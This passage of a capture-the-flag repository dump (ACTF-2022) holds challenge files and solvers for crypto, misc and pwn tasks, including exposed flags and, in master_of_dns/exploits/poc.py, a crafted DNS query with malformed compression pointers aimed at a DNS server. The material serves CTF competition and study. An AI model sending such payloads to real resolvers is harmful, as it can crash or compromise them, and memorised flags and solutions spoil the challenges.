True: 8 | p = getPrime(1024) 9 | q = inverse(e, p) 10 | if not isPrime(q): 11 | continue 12 | n = p * q; 13 | public = RSA.construct((n, e)) 14 | with open("public.pem", "wb") as file: 15 | file.write(public.exportKey('PEM')) 16 | with open("flag", "wb") as file: 17 | file.write(long_to_bytes(pow(bytes_to_long(flag), e, n))) 18 | break 19 | -------------------------------------------------------------------------------- /crypto/retros/attachments/retros: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/retros/attachments/retros -------------------------------------------------------------------------------- /crypto/secure_connection/attachments/client.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | import socketserver 3 | import argparse 4 | from core import connection_engine, connection_handle_socket 5 | import socket 6 | 7 | 8 | def banner(): 9 | print(''' 10 | ___ ___ ___ _ _ _ __ ___ ___ ___ _ __ _ __ 11 | / __|/ _ \/ __| | | | '__/ _ \/ __/ _ \| '_ \| '_ \ 12 | \__ \ __/ (__| |_| | | | __/ (_| (_) | | | | | | | 13 | |___/\___|\___|\__,_|_| \___|\___\___/|_| |_|_| |_| 14 | 15 | CLIENT 16 | ''') 17 | 18 | 19 | if __name__ == "__main__": 20 | parser = argparse.ArgumentParser() 21 | parser.add_argument("-a", "--address", required=True, 22 | help="remote ip address") 23 | parser.add_argument( 24 | "-p", "--port", help="server running port", type=int, required=True) 25 | parser.add_argument("-d", "--dump", action="store_true", default=False, 26 | help="dump payload of packet") 27 | parser.add_argument("-e", "--encrypt", action="store_true", default=False, 28 | help="enable secure encrypted connection") 29 | args = parser.parse_args() 30 | 31 | HOST, PORT = args.address, args.port 32 | 33 | banner() 34 | 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | 37 | s.connect((HOST, PORT)) 38 | 39 | handler = connection_handle_socket(s, "master", args.dump) 40 | connection_engine(handler, "master", args.encrypt) 41 | -------------------------------------------------------------------------------- /crypto/secure_connection/exploits/client.py: -------------------------------------------------------------------------------- 1 | from socket import socket 2 | import socketserver 3 | import argparse 4 | from core import connection_engine, connection_handle_socket 5 | import socket 6 | 7 | 8 | def banner(): 9 | print(''' 10 | ___ ___ ___ _ _ _ __ ___ ___ ___ _ __ _ __ 11 | / __|/ _ \/ __| | | | '__/ _ \/ __/ _ \| '_ \| '_ \ 12 | \__ \ __/ (__| |_| | | | __/ (_| (_) | | | | | | | 13 | |___/\___|\___|\__,_|_| \___|\___\___/|_| |_|_| |_| 14 | 15 | CLIENT 16 | ''') 17 | 18 | 19 | if __name__ == "__main__": 20 | parser = argparse.ArgumentParser() 21 | parser.add_argument("-a", "--address", required=True, 22 | help="remote ip address") 23 | parser.add_argument( 24 | "-p", "--port", help="server running port", type=int, required=True) 25 | parser.add_argument("-d", "--dump", action="store_true", default=False, 26 | help="dump payload of packet") 27 | parser.add_argument("-e", "--encrypt", action="store_true", default=False, 28 | help="enable secure encrypted connection") 29 | args = parser.parse_args() 30 | 31 | HOST, PORT = args.address, args.port 32 | 33 | banner() 34 | 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | 37 | s.connect((HOST, PORT)) 38 | 39 | handler = connection_handle_socket(s, "master", args.dump) 40 | connection_engine(handler, "master", args.encrypt) 41 | -------------------------------------------------------------------------------- /crypto/secure_connection/exploits/packet.txt: -------------------------------------------------------------------------------- 1 | header 2 | flags: 1bit enc | 1bit more data | 6bit opcode 3 | length: 1 byte 4 | 5 | pdu 6 | ... 7 | 8 | crc 9 | crc24 10 | 11 | opcode: 12 | 0 Dummy 13 | 1 Hello 14 | 2 SC Request 15 | 3 SC Response 16 | 4 Master Confirm 17 | 5 Slave Confirm 18 | 6 Master Random 19 | 7 Slave Random 20 | 8 Data Payload -------------------------------------------------------------------------------- /crypto/secure_connection/exploits/server.py: -------------------------------------------------------------------------------- 1 | import socketserver 2 | import argparse 3 | from core import connection_handle_request, connection_engine 4 | 5 | dump_or_not = False 6 | 7 | 8 | class MySecureHandler(socketserver.BaseRequestHandler): 9 | def handle(self): 10 | handler = connection_handle_request(self.request, "slave", dump_or_not) 11 | connection_engine(handler, "slave", True) 12 | 13 | 14 | def banner(): 15 | print(''' 16 | ___ ___ ___ _ _ _ __ ___ ___ ___ _ __ _ __ 17 | / __|/ _ \/ __| | | | '__/ _ \/ __/ _ \| '_ \| '_ \ 18 | \__ \ __/ (__| |_| | | | __/ (_| (_) | | | | | | | 19 | |___/\___|\___|\__,_|_| \___|\___\___/|_| |_|_| |_| 20 | 21 | SERVER 22 | ''') 23 | 24 | 25 | if __name__ == "__main__": 26 | parser = argparse.ArgumentParser() 27 | parser.add_argument( 28 | "-p", "--port", help="server running port", type=int, required=True) 29 | parser.add_argument("-d", "--dump", action="store_true", default=False, 30 | help="dump payload of packet") 31 | args = parser.parse_args() 32 | 33 | HOST, PORT = "0.0.0.0", args.port 34 | 35 | dump_or_not = args.dump 36 | 37 | banner() 38 | 39 | with socketserver.TCPServer((HOST, PORT), MySecureHandler) as server: 40 | # Activate the server; this will keep running until you 41 | # interrupt the program with Ctrl-C 42 | server.serve_forever() 43 | -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/logo.png -------------------------------------------------------------------------------- /misc/Broken_QRCode/README.md: -------------------------------------------------------------------------------- 1 | # Broken QRCode 2 | 3 | - uuid AA8F922E-7A7C-886E-F54C-E82D73F614D8 找到图片是第一层题目 4 | - 题目.png 是第二层题目 5 | - qrcodes 文件夹中的 12 个二维码是第三层题目 6 | 7 | 完整 writeup 在 https://blog.tonycrane.cc/p/12a2afd2.html -------------------------------------------------------------------------------- /misc/Broken_QRCode/generate.py: -------------------------------------------------------------------------------- 1 | from qrcode import * 2 | 3 | rick = [ 4 | "We're no strangers to love", 5 | "You know the rules and so do I", 6 | "A full commitment's what I'm thinking of", 7 | "You wouldn't get this from any other guy", 8 | "I just wanna tell you how I'm feeling", 9 | "Gotta make you understand", 10 | "Never gonna give you up", 11 | "Never gonna let you down", 12 | "Never gonna run around and desert you", 13 | "Never gonna make you cry", 14 | "Never gonna say goodbye", 15 | "Never gonna tell a lie and hurt you", 16 | ] 17 | 18 | for i, each in enumerate(rick): 19 | qr = QRCode( 20 | version=5, 21 | error_correction=ERROR_CORRECT_H, 22 | ) 23 | qr.add_data(each) 24 | qr.make_image().save(f"qrs/{i}.png") 25 | 26 | 27 | part2 = "0100000100000011000101001100011110010101111101101011011011100011000001110111010111110101000101010010010000110110111101100100001100110111110100001110110000011000011111000010001010011100010011010100101001000100" # 1Ly_kn0w_QRCod3} 28 | hex_value = "" 29 | 30 | for i in range(0, len(part2), 8): 31 | part = part2[i:i+8] 32 | hex_value += f"{hex(int(part, 2))[2:]:>02}" 33 | 34 | print(hex_value) 35 | # 410314c795f6b6e30775f5152436f64337d0ec187c229c4d4a44 -------------------------------------------------------------------------------- /misc/Broken_QRCode/origin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/origin.png -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/0.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/1.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/10.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/10.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/11.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/11.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/2.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/3.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/4.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/5.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/6.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/7.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/8.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/qrcodes/9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/qrcodes/9.jpg -------------------------------------------------------------------------------- /misc/Broken_QRCode/solver.py: -------------------------------------------------------------------------------- 1 | from qrcode import * 2 | from PIL import Image, ImageOps, ImageChops 3 | 4 | rick = [ 5 | "We're no strangers to love", 6 | "You know the rules and so do I", 7 | "A full commitment's what I'm thinking of", 8 | "You wouldn't get this from any other guy", 9 | "I just wanna tell you how I'm feeling", 10 | "Gotta make you understand", 11 | "Never gonna give you up", 12 | "Never gonna let you down", 13 | "Never gonna run around and desert you", 14 | "Never gonna make you cry", 15 | "Never gonna say goodbye", 16 | "Never gonna tell a lie and hurt you", 17 | ] 18 | 19 | for i, content in enumerate(rick): 20 | img1 = Image.open(f"qrcodes/{i}.jpg").convert("RGB") 21 | img2 = make(content, version=5, error_correction=ERROR_CORRECT_H).convert("RGB") 22 | cropped_img1 = img1.crop(ImageOps.invert(img1).getbbox()) 23 | cropped_img2 = img2.crop(ImageOps.invert(img2).getbbox()).resize(cropped_img1.size) 24 | ImageChops.difference(cropped_img1, cropped_img2).save(f"diff/{i}.jpg") -------------------------------------------------------------------------------- /misc/Broken_QRCode/题目.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Broken_QRCode/题目.png -------------------------------------------------------------------------------- /misc/FFSK/attachments/modem.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/FFSK/attachments/modem.wav -------------------------------------------------------------------------------- /misc/FFSK/exploits/goertzel.py: -------------------------------------------------------------------------------- 1 | """ 2 | Module to create a Goertzel filter 3 | Original source: https://github.com/laurenschneider/audiodecoder 4 | """ 5 | 6 | import numpy as np 7 | 8 | class Goertzel(): 9 | 10 | def __init__(self, rate, freq): 11 | self.normalize = 0 12 | self.coeffs = 0 13 | self.sample_rate = rate 14 | self.target_freq = freq 15 | 16 | 17 | def calculate_coeff(self): 18 | """ 19 | Precompute coefficients needed for filter equation. 20 | Coeff formulas courtesy of Prof. Massey 21 | """ 22 | n = 160 23 | 24 | w0 = (2 * np.pi * self.target_freq) / self.sample_rate 25 | self.normalize = np.exp(1j * w0 * n) 26 | self.coeffs = np.array([np.exp((-1j) * w0 * k) for k in range(n)]) 27 | 28 | def filter(self, samples): 29 | """ 30 | Goertzel filter equation 31 | :param samples: array of samples 32 | :returns: amplitude 33 | """ 34 | y = self.normalize * 160 * np.dot(self.coeffs, samples) 35 | ampl = np.abs(y) 36 | 37 | return ampl 38 | -------------------------------------------------------------------------------- /misc/Man_in_Middle/exploits/key.py: -------------------------------------------------------------------------------- 1 | from hashlib import md5 2 | 3 | def GenerateTK(ANonce:int,CNonce:int): 4 | MasterKey = b'Master33y' 5 | return md5(MasterKey+ANonce.to_bytes(4,'little')+CNonce.to_bytes(4,'little')).digest() 6 | def GenerateKey(Nonce:int,TK:bytes)->bytes: 7 | MAC = b"0031c:29:c5122:90" 8 | IV = MAC + Nonce.to_bytes(4,'little') + TK 9 | key = md5(IV) 10 | return key.digest() -------------------------------------------------------------------------------- /misc/Man_in_Middle/exploits/secret.txt: -------------------------------------------------------------------------------- 1 | Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2 2 | We introduce the key reinstallation attack. This attack abuses design 3 | or implementation flaws in cryptographic protocols to reinstall an 4 | already-in-use key. This resets the key's associated parameters such 5 | as transmit nonces and receive replay counters. Several types of 6 | cryptographic Wi-Fi handshakes are affected by the attack. 7 | All protected Wi-Fi networks use the 4-way handshake to generate a fresh session key. So far, this 14-year-old handshake has 8 | remained free from attacks, and is even proven secure. However, 9 | we show that the 4-way handshake is vulnerable to a key reinstallation attack. Here, the adversary tricks a victim into reinstalling an 10 | already-in-use key. This is achieved by manipulating and replaying 11 | handshake messages. When reinstalling the key, associated parameters such as the incremental transmit packet number (nonce) and 12 | receive packet number (replay counter) are reset to their initial 13 | value. Our key reinstallation attack also breaks the PeerKey, group 14 | ACTF{Reinstallation-in-WPA2-,:)} 15 | key, and Fast BSS Transition (FT) handshake. The impact depends 16 | on the handshake being attacked, and the data-confidentiality protocol in use. Simplified, against AES-CCMP an adversary can replay 17 | and decrypt (but not forge) packets. This makes it possible to hijack 18 | TCP streams and inject malicious data into them. Against WPATKIP and GCMP the impact is catastrophic: packets can be replayed, 19 | decrypted, and forged. Because GCMP uses the same authentication 20 | key in both communication directions, it is especially affected. 21 | Finally, we confirmed our findings in practice, and found that 22 | every Wi-Fi device is vulnerable to some variant of our attacks. -------------------------------------------------------------------------------- /misc/Man_in_Middle/exploits/solve.py: -------------------------------------------------------------------------------- 1 | import base64 2 | from email.mime import base 3 | import json 4 | from string import printable 5 | from tokenize import group 6 | from turtle import pos 7 | 8 | with open('cipher.txt','r') as f: 9 | ciphers = json.load(f) 10 | 11 | def xor(a,b): 12 | return bytes([a[i]^b[i] for i in range(16)]) 13 | 14 | # for idx in ciphers: 15 | idx = '0' 16 | key = [list(range(256)) for _ in range(16)] 17 | for cipher in ciphers[idx]: 18 | cipher = base64.b64decode(cipher) 19 | for ci in range(16): 20 | tmp = key[ci].copy() 21 | for k in tmp: 22 | if(chr(k^cipher[ci]) not in printable): 23 | key[ci].remove(k) 24 | print([bytes(i) for i in key]) 25 | 26 | 27 | real_key = [b'\x95\xfa\xbd\x9b\xc1\x80L\xcey\xc0I\xb9\xcc]\xa3\xbf', b'\xe7`@\x91g\xcaIla\x83\xf5\xdc\x83\xac\x9d\x03'] 28 | for cipher in ciphers[idx]: 29 | cipher = base64.b64decode(cipher) 30 | key = real_key[int(idx)] 31 | print(xor(key,cipher)) 32 | 33 | # def dec_one(m:dict,a,b): 34 | # c = xor(a,b) 35 | # for _ in range(16): 36 | # candidate = m[a][_] 37 | # for i in candidate: 38 | # flag = False 39 | # for j in m[b][_]: 40 | # if(i^j==c[_]): 41 | # flag = True 42 | # break 43 | # if flag == False: 44 | # m[a][_] = m[a][_].replace(bytes([i]),b'') 45 | 46 | # m = {} 47 | # for a in group0: 48 | # m[a] = [printable.encode()] * 16 49 | # for a in group0: 50 | # for b in group0: 51 | # if a!=b: 52 | # dec_one(m,a,b) 53 | # print(m[group0[0]]) 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /misc/Signin/attachments/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Signin/attachments/flag -------------------------------------------------------------------------------- /misc/Signin/exploits/compress.py: -------------------------------------------------------------------------------- 1 | import os 2 | import random 3 | 4 | input_file = 'flag' 5 | random_list = [ 6 | 'gzip', 7 | 'xz', 8 | 'bzip2', 9 | 'lzma', 10 | 'zstd' 11 | ] 12 | 13 | random_choices = [] 14 | for i in range(16): 15 | random_choices.append(random.randint(0, len(random_list) - 1)) 16 | 17 | for choice in random_choices: 18 | if choice == 0: 19 | # gzip2 20 | out_file = 'flag.gz' 21 | cmd = 'gzip flag' 22 | 23 | if choice == 1: 24 | # xz 25 | out_file = 'flag.xz' 26 | cmd = 'xz flag' 27 | 28 | if choice == 2: 29 | out_file = 'flag.bz2' 30 | cmd = 'bzip2 flag' 31 | 32 | if choice == 3: 33 | # lzma 34 | out_file = 'flag.lzma' 35 | cmd = 'lzma flag' 36 | 37 | if choice == 4: 38 | # lzma 39 | out_file = 'flag.zst' 40 | cmd = 'zstd -f flag' 41 | 42 | os.system(cmd) 43 | os.system('mv {} {}'.format(out_file, input_file)) 44 | 45 | print("done") 46 | print("choices:", random_choices) 47 | # choices: [2, 3, 3, 3, 1, 2, 1, 1, 1, 2, 0, 1, 2, 3, 3, 4] -------------------------------------------------------------------------------- /misc/Signin/exploits/decompress.py: -------------------------------------------------------------------------------- 1 | import os 2 | import random 3 | import subprocess 4 | 5 | input_file = 'flag' 6 | 7 | def get_compressed_type(filepath: str) -> str: 8 | # use file command 9 | cmd = ['file', filepath] 10 | file_cmd_output = subprocess.run(cmd, stdout=subprocess.PIPE).stdout.decode().strip() 11 | if 'gzip compressed data' in file_cmd_output: 12 | return 'gzip' 13 | 14 | if 'XZ compressed data' in file_cmd_output: 15 | return 'xz' 16 | 17 | if 'bzip2 compressed data' in file_cmd_output: 18 | return 'bzip2' 19 | 20 | if 'LZMA compressed data' in file_cmd_output: 21 | return 'lzma' 22 | 23 | if 'Zstandard compressed data' in file_cmd_output: 24 | return 'zstd' 25 | 26 | return '' 27 | 28 | while True: 29 | ctype = get_compressed_type(input_file) 30 | if ctype == "gzip": 31 | tmp_file = input_file + ".gz" 32 | cmd = "mv {} {}; gunzip {}".format(input_file, tmp_file, tmp_file) 33 | elif ctype == "xz": 34 | tmp_file = input_file + ".xz" 35 | cmd = "mv {} {}; unxz {}".format(input_file, tmp_file, tmp_file) 36 | elif ctype == "bzip2": 37 | tmp_file = input_file + ".bz2" 38 | cmd = "mv {} {}; bunzip2 {}".format(input_file, tmp_file, tmp_file) 39 | elif ctype == "lzma": 40 | tmp_file = input_file + ".lzma" 41 | cmd = "mv {} {}; unlzma {}".format(input_file, tmp_file, tmp_file) 42 | elif ctype == "zstd": 43 | tmp_file = input_file + ".zst" 44 | cmd = "mv {} {}; unzstd --force {}".format(input_file, tmp_file, tmp_file) 45 | else: 46 | print("done") 47 | break 48 | os.system(cmd) 49 | -------------------------------------------------------------------------------- /misc/Weird_rev/attachment.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/Weird_rev/attachment.tar.gz -------------------------------------------------------------------------------- /misc/탕쿠쿠의유혹/attachments/6cv_large.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/attachments/6cv_large.zip -------------------------------------------------------------------------------- /misc/탕쿠쿠의유혹/wp/broken.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/wp/broken.webp -------------------------------------------------------------------------------- /misc/탕쿠쿠의유혹/wp/diff.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/wp/diff.jpg -------------------------------------------------------------------------------- /misc/탕쿠쿠의유혹/wp/ori_twi.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/misc/탕쿠쿠의유혹/wp/ori_twi.jpg -------------------------------------------------------------------------------- /pwn/2048/attachments/2048: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/2048/attachments/2048 -------------------------------------------------------------------------------- /pwn/2048/attachments/ld-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/2048/attachments/ld-2.31.so -------------------------------------------------------------------------------- /pwn/2048/attachments/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/2048/attachments/libc-2.31.so -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/AppJailLauncher.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/AppJailLauncher.exe -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/EasyVM.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/EasyVM.exe -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/KernelBase.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/KernelBase.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/kernel32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/kernel32.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/ntdll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/ntdll.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/ucrtbase.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/ucrtbase.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/dlls/vcruntime140.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/EasyVM/attachments/dlls/vcruntime140.dll -------------------------------------------------------------------------------- /pwn/EasyVM/attachments/start.ps1: -------------------------------------------------------------------------------- 1 | Set-ProcessMitigation -Name EasyVM.exe -Enable DisallowChildProcessCreation 2 | ./AppJailLauncher.exe ./EasyVM.exe /timeout:120 /key:flag.txt /port:9999 3 | -------------------------------------------------------------------------------- /pwn/kkk/attachments/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/kkk/attachments/bzImage -------------------------------------------------------------------------------- /pwn/kkk/attachments/rootfs.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/kkk/attachments/rootfs.img -------------------------------------------------------------------------------- /pwn/kkk/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo qemu-system-x86_64 \ 4 | -m 1024M \ 5 | -kernel bzImage \ 6 | -initrd rootfs.img \ 7 | -monitor /dev/null \ 8 | -append "root=/dev/ram console=ttyS0 oops=panic panic=1 kpti=1 quiet" \ 9 | -cpu kvm64,+smep,+smap \ 10 | -smp cores=2,threads=2 \ 11 | -nographic -enable-kvm 12 | -------------------------------------------------------------------------------- /pwn/kkk/exploits/libcrc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/kkk/exploits/libcrc.so -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/README.md: -------------------------------------------------------------------------------- 1 | # readme 2 | 3 | - run command 4 | 5 | ```python 6 | ./start.sh 7 | ``` 8 | 9 | - test 10 | 11 | ```python 12 | dig @127.0.0.1 -p 9999 baidu.com 13 | 14 | ; <<>> DiG 9.16.1-Ubuntu <<>> @127.0.0.1 -p 9999 baidu.com 15 | ; (1 server found) 16 | ;; global options: +cmd 17 | ;; Got answer: 18 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 339 19 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 20 | 21 | ;; OPT PSEUDOSECTION: 22 | ; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 4096 23 | ; COOKIE: cf2958cf5b8f520740e4d5a8625d4a26824b1325aed43d79 (good) 24 | ;; QUESTION SECTION: 25 | ;baidu.com. IN A 26 | 27 | ;; ANSWER SECTION: 28 | baidu.com. 5 IN A 220.181.38.251 29 | baidu.com. 5 IN A 220.181.38.148 30 | 31 | ;; Query time: 31 msec 32 | ;; SERVER: 127.0.0.1#9999(127.0.0.1) 33 | ;; WHEN: Mon Apr 18 19:23:18 CST 2022 34 | ;; MSG SIZE rcvd: 98 35 | ``` -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/dns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/master_of_dns/attachments/dns -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/dns.conf: -------------------------------------------------------------------------------- 1 | port=9999 2 | no-resolv 3 | server = 114.114.114.114 4 | server = 8.8.8.8 5 | listen-address=0.0.0.0 6 | bind-interfaces 7 | no-hosts 8 | no-negcache 9 | address=/test.com/5.5.5.5 10 | -------------------------------------------------------------------------------- /pwn/master_of_dns/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Add your startup script 3 | 4 | while true; 5 | do 6 | port=9999 7 | pid=$(netstat -nlp | grep :$port | awk '{print $7}' | awk -F"/" '{ print $1 }'); 8 | 9 | if [ -n "$pid" ]; then 10 | kill -9 $pid; 11 | fi 12 | timeout -k 1 60 ./dns -C ./dns.conf 2>/dev/null 13 | 14 | sleep 15 15 | done 16 | -------------------------------------------------------------------------------- /pwn/master_of_dns/exploits/poc.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | import argparse 4 | import random 5 | import string 6 | 7 | # 无需connect服务端,因为发送时候跟上服务端ip和port就行 8 | client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 9 | 10 | def genRandom(num, slen): 11 | unique_strings = [] 12 | while len(unique_strings) < num: 13 | ustring = ''.join(random.choice(string.ascii_lowercase + string.ascii_lowercase + string.digits) for i in range(slen)) 14 | if ustring not in unique_strings: 15 | unique_strings.append(ustring) 16 | return unique_strings 17 | 18 | def dnsquery(ip, port): 19 | query = os.urandom(2) 20 | query += b'\x01\x00' # Flags: query + Truncated + Recursion Desired + Recursion Available 21 | query += b'\x00\x01' # Questions 22 | query += b'\x00\x00' # Answer RRs 23 | query += b'\x00\x00' # Authority RRs 24 | query += b'\x00\x00'# Additional RRs 25 | 26 | # Queries 27 | payload = b'\x3f' * 0x40 28 | for i in range(15): 29 | payload += b'\xc0' 30 | payload += bytes([0xe + i * 2]) 31 | payload += b'\x00' 32 | print(payload) 33 | query += payload # Name 34 | query += b'\x00\x01' # Type: NS 35 | query += b'\x00\x01'# Class: IN 36 | 37 | client.sendto(query, (ip, int(port))) 38 | data, server_addr = client.recvfrom(1024) 39 | print(data) 40 | 41 | def main(): 42 | parser = argparse.ArgumentParser() 43 | parser.add_argument('-ip', help='ip address', required=True) 44 | parser.add_argument('-port', help='port', required=True) 45 | args = parser.parse_args() 46 | 47 | ip = args.ip 48 | port = args.port 49 | dnsquery(ip, port) 50 | 51 | 52 | if __name__ == '__main__': 53 | main() -------------------------------------------------------------------------------- /pwn/mykvm/attachments/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | 3 | RUN sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list && \ 4 | apt-get update && apt-get -y dist-upgrade && \ 5 | apt-get install -y lib32z1 xinetd gdb vim python git 6 | 7 | RUN useradd -m ctf 8 | 9 | WORKDIR /home/ctf 10 | 11 | RUN cp -R /usr/lib* /home/ctf 12 | 13 | RUN mkdir /home/ctf/dev && \ 14 | mknod /home/ctf/dev/null c 1 3 && \ 15 | mknod /home/ctf/dev/zero c 1 5 && \ 16 | mknod /home/ctf/dev/random c 1 8 && \ 17 | mknod /home/ctf/dev/urandom c 1 9 && \ 18 | chmod 666 /home/ctf/dev/* 19 | 20 | RUN mkdir /home/ctf/bin && \ 21 | cp /bin/sh /home/ctf/bin && \ 22 | cp /bin/ls 